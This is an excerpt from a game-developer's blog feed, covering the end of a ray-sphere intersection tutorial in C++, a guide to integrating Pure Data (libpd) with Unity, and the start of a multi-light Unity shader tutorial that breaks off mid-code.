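<p>Now we just sub in our known values from earlier. L is the hypotenuse (c) and tc is edge a, so, writing L² for the squared length of L (that is, L · L):</p>
<div align="center">
d = √(L² - tc²)
</div>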
<p><br /></p>
<p>Just like tc before it, this is an important calculation. If d is greater than the radius of our sphere, it means that t1c will give us a point outside of the sphere, and our ray doesn’t intersect at all (and we can go home early).</p>
<p>If not, great! Time to move on to the next triangle.</p>
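<p>As a quick sanity check of this triangle, here is a small sketch that computes d² and compares it against the radius. The names are invented for the example, and it works with squared values so the comparison doesn’t need a square root. The hypotenuse is L, so d² is the squared length of L minus tc²:</p>

```cpp
// Minimal stand-in for the post's vec3 type (an assumption, not a real library).
struct Vec3 { float x, y, z; };

float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

// Hypothetical helper: squared distance from the sphere's center to the ray.
// L is the hypotenuse and tc is one edge, so d^2 = |L|^2 - tc^2.
float distanceSquaredToRay(Vec3 L, float tc)
{
    return dot(L, L) - tc * tc;
}

// Hypothetical helper: the ray can only hit the sphere if d <= radius.
bool withinRadius(Vec3 L, float tc, float radius)
{
    return distanceSquaredToRay(L, tc) <= radius * radius;
}
```

<p>With L = (0, 1, 5) and tc = 5, d² works out to 26 - 25 = 1, so a sphere of radius 2 can be hit while a sphere of radius 0.5 is missed.</p>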
<h2>Solving for t1c</h2>
<p><br /></p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere6.png" /><br />
</div>
<p><br />
Now that we have tc and d, this is actually incredibly easy. We already know the length of the edge labelled h (it’s the radius of the sphere, and the hypotenuse of this triangle) and the length of d. Using Pythagoras’ Theorem again gives us:</p>
<div align="center">
a² = c² - b² <br />
a = √(c² - b²) <br />
t1c = √(radius² - d²) <br />
</div>
<p><br /></p>
<p>Guess that means it’s time to move on to yet another subheading eh?</p>
<h2>Solving for t1 and t2</h2>
<p>Let’s look at our original diagram again:</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere7.png" /><br />
</div>
<p>Notice anything? Now that we have values for t1c and tc, solving for the two variables we actually want is trivial!</p>
<div align="center">
t1 = tc - t1c
<br />
t2 = tc + t1c
<br />
</div>
<p><br /></p>
<p>Which means that all we need to do to get our intersection points is:</p>
<div align="center">
P1 = Origin + Direction * t1
<br />
P2 = Origin + Direction * t2
</div>
<p><br /></p>
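<p>The last two steps can be sketched together like this. <code>Hits</code> and <code>solveHits</code> are hypothetical names for this example, and the sketch assumes the earlier checks already passed (so d² is no larger than radius²):</p>

```cpp
#include <cmath>

// Hypothetical result type holding the two t values.
struct Hits
{
    float t1; // distance along the ray to the near intersection
    float t2; // distance along the ray to the far intersection
};

// Assumes d2 <= radius * radius, i.e. the ray is already known to hit.
Hits solveHits(float tc, float d2, float radius)
{
    float t1c = std::sqrt(radius * radius - d2);
    return {tc - t1c, tc + t1c};
}
```

<p>For a ray that passes straight through the center of a sphere of radius 2 (so d² = 0) with tc = 5, this gives t1 = 3 and t2 = 7. Plugging those into Origin + Direction * t gives P1 and P2.</p>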
<h2>An Intersect Function</h2>
<p><br />
Congratulations on getting this far! Now that we have all that theory out of the way, it’s time for your prize: a sphere intersection function! Let’s see what that might look like if we simply went step by step using the instructions above:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="kt">bool</span> <span class="nf">intersect</span><span class="p">(</span><span class="n">Ray</span><span class="o">*</span> <span class="n">r</span><span class="p">,</span> <span class="n">Sphere</span><span class="o">*</span> <span class="n">s</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//solve for tc</span>
<span class="n">vec3</span> <span class="n">L</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">center</span> <span class="o">-</span> <span class="n">r</span><span class="o">-></span><span class="n">origin</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">tc</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">r</span><span class="o">-></span><span class="n">direction</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">tc</span> <span class="o"><</span> <span class="mf">0.0</span> <span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">d</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">L</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">tc</span><span class="o">*</span><span class="n">tc</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">d</span> <span class="o">></span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//solve for t1c</span>
<span class="kt">float</span> <span class="n">t1c</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">(</span> <span class="p">(</span><span class="n">s</span><span class="o">-></span><span class="n">radius</span> <span class="o">*</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">d</span><span class="o">*</span><span class="n">d</span><span class="p">)</span> <span class="p">);</span>
<span class="c1">//solve for intersection points</span>
<span class="kt">float</span> <span class="n">t1</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">-</span> <span class="n">t1c</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">t2</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">+</span> <span class="n">t1c</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>For really basic use cases, the above may be sufficient, but there’s an awful lot of wasted effort up there (like calculating t1 and t2 and then not using them). For a ray tracer (the use case that led me to writing this post) it isn’t enough just to know if a ray hits an object, you need to know exactly where the point of contact is.</p>
<p>So let’s rethink the above function (and optimize it in the process):</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="kt">bool</span> <span class="nf">intersect</span><span class="p">(</span><span class="n">Ray</span><span class="o">*</span> <span class="n">r</span><span class="p">,</span> <span class="n">Sphere</span><span class="o">*</span> <span class="n">s</span><span class="p">,</span> <span class="kt">float</span><span class="o">*</span> <span class="n">t1</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">t2</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//solve for tc</span>
<span class="n">vec3</span> <span class="n">L</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">center</span> <span class="o">-</span> <span class="n">r</span><span class="o">-></span><span class="n">origin</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">tc</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">r</span><span class="o">-></span><span class="n">direction</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">tc</span> <span class="o"><</span> <span class="mf">0.0</span> <span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">d2</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">L</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">tc</span><span class="o">*</span><span class="n">tc</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">radius2</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span> <span class="o">*</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">d2</span> <span class="o">></span> <span class="n">radius2</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//solve for t1c</span>
<span class="kt">float</span> <span class="n">t1c</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">(</span> <span class="n">radius2</span> <span class="o">-</span> <span class="n">d2</span> <span class="p">);</span>
<span class="c1">//solve for intersection points</span>
<span class="o">*</span><span class="n">t1</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">-</span> <span class="n">t1c</span><span class="p">;</span>
<span class="o">*</span><span class="n">t2</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">+</span> <span class="n">t1c</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Much better! Not only are we getting the solved t values out of the function, but we’ve also managed to get rid of a costly square root operation. This may not seem like a big deal, but when you factor in how many times you will be calling this intersect function, any optimizations you can make pay dividends.</p>
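<p>If you want something you can paste into a file and compile, here is one possible self-contained take on the same function. It is a sketch rather than the exact code from my ray tracer: <code>Vec3</code> is a stand-in for whatever vector type you use, it takes references instead of pointers, it assumes the ray’s direction is already normalized, and <code>nearestHit</code> is a hypothetical helper added to show how the outputs might be consumed:</p>

```cpp
#include <cmath>

// Minimal stand-in for the post's vec3 type (an assumption, not a real library).
struct Vec3 { float x, y, z; };

Vec3 operator-(Vec3 a, Vec3 b) { return {a.x - b.x, a.y - b.y, a.z - b.z}; }
float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

struct Ray { Vec3 origin; Vec3 direction; }; // direction assumed to be unit length
struct Sphere { Vec3 center; float radius; };

// Returns true on a hit and writes the two distances along the ray to t1 and t2.
bool intersect(const Ray& r, const Sphere& s, float& t1, float& t2)
{
    // solve for tc
    Vec3 L = s.center - r.origin;
    float tc = dot(L, r.direction);
    if (tc < 0.0f) return false;

    // squared distance from the sphere's center to the ray
    float d2 = dot(L, L) - tc * tc;
    float radius2 = s.radius * s.radius;
    if (d2 > radius2) return false;

    // solve for t1c, then the two intersection distances
    float t1c = std::sqrt(radius2 - d2);
    t1 = tc - t1c;
    t2 = tc + t1c;
    return true;
}

// Hypothetical helper: distance to the nearest hit, or -1 on a miss.
float nearestHit(const Ray& r, const Sphere& s)
{
    float t1 = 0.0f;
    float t2 = 0.0f;
    return intersect(r, s, t1, t2) ? t1 : -1.0f;
}
```

<p>A ray from the origin along +z against a unit sphere centered at (0, 0, 5) should report hits at t = 4 and t = 6, while moving the sphere to (0, 3, 5) or (0, 0, -5) should report a miss.</p>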
<p>Whew, that was a long post. If anything is unclear, or you spot a mistake (I wrote most of this on a train, it’s very possible something is a bit off) feel free to send me a message <a href="http://twitter.com/khalladay">on Twitter.</a></p>
<p>Merry Christmas! :D</p>
Combining Pure Data and Unity2013-11-10T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/11/10/Libpd-and-Unity<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>About 6 months ago, for 1GAM, Johannes and I spent a month tinkering with LibPD (the end result was Synapse). LibPD, for those of you who don’t know, is a library for working with <a href="http://puredata.info/">Pure-Data</a>, a visual programming tool for procedural audio. Out of the box, it doesn’t work nicely with Unity, but there’s a repository called libpd4unity that simplifies the process.</p>
<div align="center">
<img src="/images/post_images/2013-11-10/pd.png" /><br />
<font size="2">
The sample pd program used in this tutorial
</font>
</div>
<p><br /></p>
<p>Libpd4unity isn’t suited to really in depth PD development in Unity (at the moment it seems to only support loading one patch at a time), but you can still do some interesting things with it. So today, I’m going to go over the process of setting up libpd4unity with Unity.</p>
<p>If you’re on Mac, you may be a bit disappointed to see that there isn’t a Mac compatible pd library in the libpd4unity repo, so the first step for us is to compile a .bundle for Mac. If you’re on Windows, skip down to the actual programming.</p>
<h2>Building libpdcsharp.bundle</h2>
<p>Thankfully this is pretty straightforward, if a bit weird:</p>
<ul>
<li>Download the <a href="https://github.com/libpd/libpd">LibPD Project</a> from github</li>
<li>In terminal, cd into the downloaded project folder and type the command <a href="https://github.com/libpd/libpd/wiki/Building-the-C%23-Api">make csharplib</a></li>
<li>libpdcsharp.dylib should now be created inside the libs folder. Copy that to the Assets/Plugins folder in Unity</li>
<li>Rename this file to libpdcsharp.bundle. Unity has a problem locating dylibs.</li>
<li>You’re good to go!</li>
</ul>
<h2>LibPD and Unity</h2>
<p>Note: You will need to download <a href="https://github.com/patricksebastien/libpd4unity">Libpd4Unity</a></p>
<p>Ok now that that’s out of the way, it’s time for some fun stuff. First off, copy the LibPD folder from libpd4unity/Assets, and paste it into the assets folder of your project.</p>
<p>Next, make an Assets/Resources folder. This is a special folder that allows you to specify resources that you want to have available to Unity at runtime. Put your patches in this folder (or a subfolder of it). If you don’t have a patch to work with, or want to follow along exactly with this demo, you can grab the <a href="https://github.com/khalladay/Unity-PD-Sample/blob/master/Assets/Resources/example.pd">simple sine patch</a> from the repo for this post’s example project (patch courtesy of <a href="johannesg.com">johannesg.com</a> ).</p>
<p>Now that all the housekeeping is taken care of, it’s time to actually interact with a patch program from Unity. LibPd4Unity comes with an example script called LibPdFilterRead.cs that will serve as the basic outline for our class, but we’re going to tailor ours to suit our needs a bit better.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">using</span> <span class="nn">UnityEngine</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Collections</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">LibPDBinding</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.InteropServices</span><span class="p">;</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">OSCControl</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">string</span> <span class="n">patch</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">playOnAwake</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">patchIsStereo</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">patchName</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">bool</span> <span class="n">islibpdready</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">string</span> <span class="n">path</span><span class="p">;</span>
<span class="k">private</span> <span class="n">GCHandle</span> <span class="n">dataHandle</span><span class="p">;</span>
<span class="k">private</span> <span class="n">IntPtr</span> <span class="n">dataPtr</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">float</span> <span class="n">freq</span> <span class="p">=</span> <span class="m">500</span><span class="p">;</span></code></pre></figure>
<p>The script I’m going to build here interacts with the sample patch linked above.</p>
<p>Let’s go through these variables:</p>
<ul>
<li>patch: the name of the patch file to use</li>
<li>playOnAwake: what it says on the tin</li>
<li>patchIsStereo: only check this if you are SURE your patch is stereo, otherwise you’ll hear garbled crap</li>
<li>patchName: the integer patch name generated by LibPD</li>
<li>islibpdready: does what it says on the tin</li>
<li>path: this will be the patch variable with the rest of the filepath prepended to it</li>
<li>dataHandle: this will eventually be used to let us have access to the audio stream from pd without worrying about the garbage collector</li>
<li>dataPtr: this will hold the address of the pinned audio buffer that we pass to pd</li>
<li>freq: the frequency we want to pass to our program</li>
</ul>
<p>Now let’s get to some functionality</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Awake</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">path</span> <span class="p">=</span> <span class="n">Application</span><span class="p">.</span><span class="n">dataPath</span> <span class="p">+</span> <span class="s">"/Resources/"</span> <span class="p">+</span> <span class="n">patch</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">playOnAwake</span><span class="p">)</span><span class="nf">loadPatch</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">public</span> <span class="k">void</span> <span class="nf">loadPatch</span> <span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span><span class="p">(!</span><span class="n">islibpdready</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(!</span><span class="n">patchIsStereo</span><span class="p">)</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenAudio</span> <span class="p">(</span><span class="m">1</span><span class="p">,</span><span class="m">1</span><span class="p">,</span> <span class="m">48000</span><span class="p">);</span>
<span class="k">else</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenAudio</span><span class="p">(</span><span class="m">2</span><span class="p">,</span><span class="m">2</span><span class="p">,</span><span class="m">48000</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">patchName</span> <span class="p">=</span> <span class="n">LibPD</span><span class="p">.</span><span class="nf">OpenPatch</span> <span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">ComputeAudio</span> <span class="p">(</span><span class="k">true</span><span class="p">);</span>
<span class="n">islibpdready</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Awake isn’t all that interesting, except to show off how to get the actual file path to the patch. Also note that loadPatch() needs to be called before we can start working with pd.</p>
<p>loadPatch is the standard initialization sequence for working with libPd.</p>
<p>I’m going to hold off on the good stuff until the end, so we’re going to skip from the initialization process down to the cleanup process. This is a little more involved than the usual in C# because we are explicitly telling the garbage collector to not interact with the data stream, so we need to do a bit of manual memory management. This is taken directly from the example project in LibPd4Unity.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">void</span> <span class="nf">closePatch</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">ClosePatch</span> <span class="p">(</span><span class="n">patchName</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">Release</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">OnApplicationQuit</span> <span class="p">()</span>
<span class="p">{</span>
<span class="nf">closePatch</span> <span class="p">();</span>
<span class="p">}</span>
<span class="k">public</span> <span class="k">void</span> <span class="nf">OnDestroy</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">dataHandle</span><span class="p">.</span><span class="nf">Free</span><span class="p">();</span>
<span class="n">dataPtr</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I don’t have a good explanation for why we don’t need to free the dataHandle on close patch, so if anyone has an idea, shoot me a message on twitter and I can update the post. Otherwise, this is boilerplate code that will need to be added to every class that you write that will handle loading a Pd program.</p>
<p>And now finally, the good stuff!</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">void</span> <span class="nf">OnAudioFilterRead</span> <span class="p">(</span><span class="kt">float</span><span class="p">[]</span> <span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">channels</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="n">dataPtr</span> <span class="p">==</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">dataHandle</span> <span class="p">=</span> <span class="n">GCHandle</span><span class="p">.</span><span class="nf">Alloc</span><span class="p">(</span><span class="n">data</span><span class="p">,</span><span class="n">GCHandleType</span><span class="p">.</span><span class="n">Pinned</span><span class="p">);</span>
<span class="n">dataPtr</span> <span class="p">=</span> <span class="n">dataHandle</span><span class="p">.</span><span class="nf">AddrOfPinnedObject</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">LibPD</span><span class="p">.</span><span class="nf">Process</span><span class="p">(</span><span class="m">32</span><span class="p">,</span> <span class="n">dataPtr</span><span class="p">,</span> <span class="n">dataPtr</span><span class="p">)==</span><span class="m">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">SendFloat</span><span class="p">(</span><span class="n">patchName</span> <span class="p">+</span> <span class="s">"freq1"</span><span class="p">,</span> <span class="n">freq</span><span class="p">);</span>
<span class="n">LibPD</span><span class="p">.</span><span class="nf">SendFloat</span><span class="p">(</span><span class="n">patchName</span> <span class="p">+</span> <span class="s">"freq2"</span><span class="p">,</span> <span class="n">freq</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">OnGUI</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">r</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Rect</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">50</span> <span class="p">,</span>
<span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">150</span><span class="p">,</span>
<span class="m">100</span><span class="p">,</span>
<span class="m">300</span><span class="p">);</span>
<span class="n">freq</span> <span class="p">=</span> <span class="n">GUI</span><span class="p">.</span><span class="nf">VerticalSlider</span><span class="p">(</span><span class="n">r</span><span class="p">,</span><span class="n">freq</span><span class="p">,</span><span class="m">1000</span><span class="p">,</span> <span class="m">400</span><span class="p">);</span>
<span class="n">Rect</span> <span class="n">r2</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Rect</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">/</span><span class="m">2</span><span class="p">-</span><span class="m">30</span><span class="p">,</span>
<span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">/</span><span class="m">2</span> <span class="p">-</span> <span class="m">30</span><span class="p">,</span>
<span class="m">80</span><span class="p">,</span>
<span class="m">30</span><span class="p">);</span>
<span class="n">GUI</span><span class="p">.</span><span class="nf">Box</span><span class="p">(</span><span class="n">r2</span><span class="p">,</span> <span class="s">""</span><span class="p">+</span><span class="n">freq</span><span class="p">+</span><span class="s">" hz"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>OnAudioFilterRead is the Unity callback that LibPd4Unity hooks into. Unity calls it each time a chunk of audio passes through the audio filter chain. I’m really not sure why we’re checking that LibPD.Process returns 0, although I assume that’s LibPD’s “all good” return value.
Inside that block you can see how to pass messages to the currently running patch. What tripped me up for a while was both the need to prefix the target value’s name with the int name of the loaded patch, and the need to leave off the “$0” part of the variable name, which is displayed when you open the patch in pd.</p>
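<p>To make those two details a bit more concrete, here is a small C++ sketch (not part of LibPd4Unity). The helper names ticksForBuffer and receiverName are made up for illustration. It assumes that the first argument to Process is a count of Pd “ticks”, that one tick is 64 sample frames (libpd’s default block size), and that the receiver name you send to is just the patch’s integer id followed by the name shown in Pd with its leading “$0” removed.</p>

```cpp
#include <cstddef>
#include <string>

// Assumption: Pd processes audio in blocks ("ticks") of 64 frames,
// which is libpd's default block size.
constexpr std::size_t kPdBlockSize = 64;

// Hypothetical helper: number of whole ticks that fit in an interleaved
// buffer holding `sampleCount` floats across `channels` channels.
std::size_t ticksForBuffer(std::size_t sampleCount, std::size_t channels) {
    if (channels == 0) return 0;  // avoid dividing by zero
    const std::size_t frames = sampleCount / channels;
    return frames / kPdBlockSize;
}

// Hypothetical helper: builds the name to send a message to.
// Strips a leading "$0" (if present) and prefixes the patch's integer id.
std::string receiverName(int patchId, const std::string& nameInPd) {
    const std::string prefix = "$0";
    std::string suffix = nameInPd;
    if (suffix.compare(0, prefix.size(), prefix) == 0) {
        suffix.erase(0, prefix.size());
    }
    return std::to_string(patchId) + suffix;
}
```

<p>Under those assumptions, a stereo buffer of 4096 floats works out to 32 ticks, and a receiver shown in Pd as “$0freq1” in a patch with id 1003 would be addressed as “1003freq1”. Whether that is really where the hard-coded 32 in the code above comes from is a guess on my part.</p>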
<h2>Building a Project on Mac</h2>
<p>Everything should now work fine in the editor, but if you’re on a Mac, your journey is not over yet!</p>
<p>If you have tried to actually create a build, you will have noticed the big, ugly error message that pops up:</p>
<p><strong>Error building Player: IOException: Cannot create Temp/StagingArea/UnityPlayer.app/Contents/Plugins/libpdcsharp.bundle/libpdcsharp.bundle because a file with the same name already exists.</strong></p>
<p>Apparently Unity really really hates people who use libpd. Thankfully, there is a solution!</p>
<ul>
<li>Remove libpdcsharp.bundle from your plugins folder (but don’t delete it, we’ll need it in a second)</li>
<li>Build your project as you normally would</li>
<li>Locate the .app file that you just built, right click on it, and select “Show Package Contents,” and open the “Contents” folder within</li>
<li>If there is no folder named “Plugins” inside Contents, create one now.</li>
<li>Paste libpdcsharp.bundle into the Plugins folder</li>
<li>Go back to your Unity project, and copy the .pd file from your resources folder</li>
<li>Paste this file into the Resources folder located inside your .app’s Contents folder.</li>
</ul>
<p>All of this is necessary because Unity’s build process doesn’t like the libpdcsharp bundle, and attempts to copy it multiple times (creating that ugly error), and completely ignores the patch file in Resources because it doesn’t recognize the file extension. Thankfully, all that’s needed to resolve this is a mildly annoying process.</p>
<p>If you’ve made it this far, you should now have a Unity project that can interact with Pure Data plugins, and can actually create builds! Congratulations! If you’ve hit any difficulties or need further clarification on something I’ve said here, you can download a sample project <a href="https://dl.dropboxusercontent.com/u/6128167/Unity-PD-Sample.zip">from my dropbox</a>, or send me a message <a href="http://twitter.com/khalladay">on Twitter.</a> Hope this tutorial helped!</p>
Writing Multi-Light Pixel Shaders in Unity2013-10-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/10/13/Multi-Light-Diffuse<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>One of the first things that people get shown when they start learning shaders is how to write a simple, single light, diffuse shader. I have yet to see a single shader tutorial out there that ever returns to this initial exercise to demonstrate how to write shaders which can properly interact with multiple (and different kinds of) lights. So I’m going to try to fill in that gap with what I’ve managed to figure out on my own.</p>
<p>This will hopefully serve as a good starting point for any truly custom lighting shaders you want to write. To be clear, the end goal of this tutorial is simply to have a pixel shader that looks as close as possible to the built in Diffuse shader. The end result of this shader looks like this:</p>
<div align="center">
<img src="/images/post_images/2013-10-13/shader_output.png" /><br />
<font size="2">
Our shader is on the left, compared to the built in diffuse on the right
</font>
</div>
<p><br /></p>
<p>Ok, let’s get started with a basic skeleton of what we’re building. Multi-light shaders (in Forward Rendering) use a separate pass for each pixel light in the scene. How this looks in practice is 2 defined passes in the shader. One (the Base Pass) renders the first light in the scene, and the second pass (the Add pass) gets called once for each additional light, and is additively blended with the previous passes. It looks something like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="n">Shader</span> <span class="s">"BetterDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_Color</span> <span class="p">(</span><span class="s">"Main Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB) Alpha (A)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"Queue"</span> <span class="o">=</span> <span class="s">"Geometry"</span> <span class="s">"RenderType"</span> <span class="o">=</span> <span class="s">"Opaque"</span><span class="p">}</span>
<span class="n">Pass</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ForwardBase"</span><span class="p">}</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="n">Pass</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ForwardAdd"</span><span class="p">}</span>
<span class="n">Blend</span> <span class="n">One</span> <span class="n">One</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">Fallback</span> <span class="s">"VertexLit"</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing compiles yet, but at least we have the basic structure we’re going to use in place. You can see above that the base and add passes are marked using the LightMode tag, which tells Unity what role each pass plays in the lighting pipeline. The “Forward” prefix on Add and Base identifies that these passes are for Forward rendering. This tutorial won’t cover Deferred Rendering (mostly because I haven’t wrapped my head around it yet).</p>
<p>If you’re wondering, the fallback to VertexLit allows us to use the VertexLit shader’s shadow passes. Our shader will not cast shadows properly without this.</p>
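<p>If the “additively blended” part feels abstract, here is a rough CPU-side C++ sketch of what Blend One One does to a single pixel across the passes. The names blendOneOne and shadePixel are made up for this example, and it ignores everything else the GPU does (depth testing, clamping to the render target’s range, and so on).</p>

```cpp
#include <array>
#include <vector>

using Color = std::array<float, 3>;

// "Blend One One": result = source * 1 + destination * 1.
Color blendOneOne(const Color& src, const Color& dst) {
    return {src[0] + dst[0], src[1] + dst[1], src[2] + dst[2]};
}

// The base pass writes its colour to the framebuffer first.
// Each additional light then runs the add pass, and its output
// is summed onto whatever is already in the framebuffer.
Color shadePixel(const Color& basePass, const std::vector<Color>& addPasses) {
    Color framebuffer = basePass;
    for (const Color& add : addPasses) {
        framebuffer = blendOneOne(add, framebuffer);
    }
    return framebuffer;
}
```

<p>So a pixel lit by three lights ends up as the base pass colour plus the output of two add passes, which is why anything you only want applied once (like ambient light) has to live in the base pass.</p>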
<p>Next, let’s look at what our vertex input and output structs need to be:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
